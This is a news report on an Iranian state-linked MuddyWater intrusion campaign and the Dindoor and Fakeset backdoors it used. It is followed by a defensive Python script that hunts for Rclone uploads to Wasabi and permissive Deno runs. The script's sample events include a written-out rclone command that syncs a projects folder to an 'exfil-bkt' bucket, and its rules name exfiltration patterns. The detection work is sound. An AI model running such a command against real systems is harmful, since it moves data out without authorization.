An Iranian state-linked hacking group has infiltrated multiple US organizations, including banks, airports, and a defense-industry software supplier, according to a new report from Broadcom’s security divisions Symantec Threat Hunter Team and Carbon Black Threat Hunter Team.
The activity has been attributed to MuddyWater, a hacking unit believed to be affiliated with Iran’s Ministry of Intelligence and Security. Researchers say the campaign began in early February and intensified following recent US and Israeli military strikes on Iran.
Among the targets was the Israeli branch of a software company that supplies products to the defense and aerospace sectors. Investigators believe the group focused specifically on the company’s Israel-based operations.
The attacks against the software supplier, a US bank, and a Canadian non-profit organization deployed a previously unknown backdoor called ‘Dindoor.’ The malware uses the Deno runtime environment to execute malicious commands on compromised systems.
Researchers also detected an attempt to exfiltrate data from the software company using the open-source tool Rclone. The data was reportedly sent to a storage bucket hosted by Wasabi Technologies, although researchers say it is unclear whether the exfiltration attempt was successful.
In a separate intrusion affecting a US airport and a non-profit organization, the attackers deployed a Python-based backdoor known as Fakeset, which was downloaded from infrastructure linked to US cloud storage and backup provider Backblaze. The digital certificate used to sign Fakeset has previously been used to sign other malware tools called Stagecomp and Darkcomp, both associated with MuddyWater. Although the tools were not found in the latest intrusions, the shared certificates point to the same perpetrator.
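Two of the behaviours described above, Rclone pushing data to a Wasabi bucket and the Deno runtime launching a script with broad permissions, are the kind of thing a defender can hunt for in process-creation telemetry. The following is an added example with constructed event records; it is not code from the Symantec/Carbon Black report, and the JSON field names, hostnames and command lines are assumptions.

```python
import json

# Constructed sample process-creation events (JSON lines); not real telemetry.
SAMPLE_EVENTS = """
{"host":"ws-17","user":"svc_backup","cmd":"rclone.exe sync C:\\\\Projects :s3:exfil-bkt --s3-provider Wasabi --s3-endpoint s3.wasabisys.com"}
{"host":"ws-17","user":"svc_backup","cmd":"rclone.exe sync D:\\\\Share corp-backup:nightly"}
{"host":"ws-04","user":"jdoe","cmd":"deno.exe run -A C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\upd.ts"}
{"host":"ws-04","user":"jdoe","cmd":"deno.exe fmt src\\\\main.ts"}
""".strip().splitlines()

# Strings that indicate a Wasabi S3 destination on an rclone command line
# (compared case-insensitively).
WASABI_MARKERS = ("wasabisys.com", "--s3-provider wasabi")

# Deno flags that grant the script network or process-spawning access.
DENO_BROAD_PERMS = ("-A", "--allow-all", "--allow-net", "--allow-run")


def is_rclone_remote(arg):
    """rclone remotes look like 'name:path' or ':backend:path'; a Windows
    drive letter such as 'C:\\Projects' is a local path."""
    if arg.startswith(":"):
        return True
    head, sep, _ = arg.partition(":")
    return bool(sep) and not (len(head) == 1 and head.isalpha())


def classify(cmd):
    """Return a rule name for a suspicious command line, else None.
    Commands are split on whitespace; quoted paths are out of scope here."""
    argv = cmd.split()
    exe = argv[0].rsplit("\\", 1)[-1].lower()
    low = cmd.lower()
    if exe in ("rclone", "rclone.exe"):
        # rclone <copy|sync|move> <source> <dest>: flag when dest is a remote
        # and the command line names a Wasabi endpoint or provider.
        to_remote = len(argv) >= 4 and argv[1] in ("copy", "sync", "move") \
            and is_rclone_remote(argv[3])
        if to_remote and any(m in low for m in WASABI_MARKERS):
            return "rclone-to-wasabi"
    if exe in ("deno", "deno.exe") and len(argv) > 1 and argv[1] == "run":
        if any(a in DENO_BROAD_PERMS or a.startswith("--allow-net=")
               for a in argv[2:]):
            return "deno-permissive-run"
    return None


def hunt(lines):
    """Run classify() over JSON-lines events; return (host, user, rule)."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        rule = classify(ev["cmd"])
        if rule:
            findings.append((ev["host"], ev["user"], rule))
    return findings
```

The routine backup to the corporate remote and the `deno fmt` invocation are left alone; only the Wasabi-bound sync and the permissive `deno run` are reported.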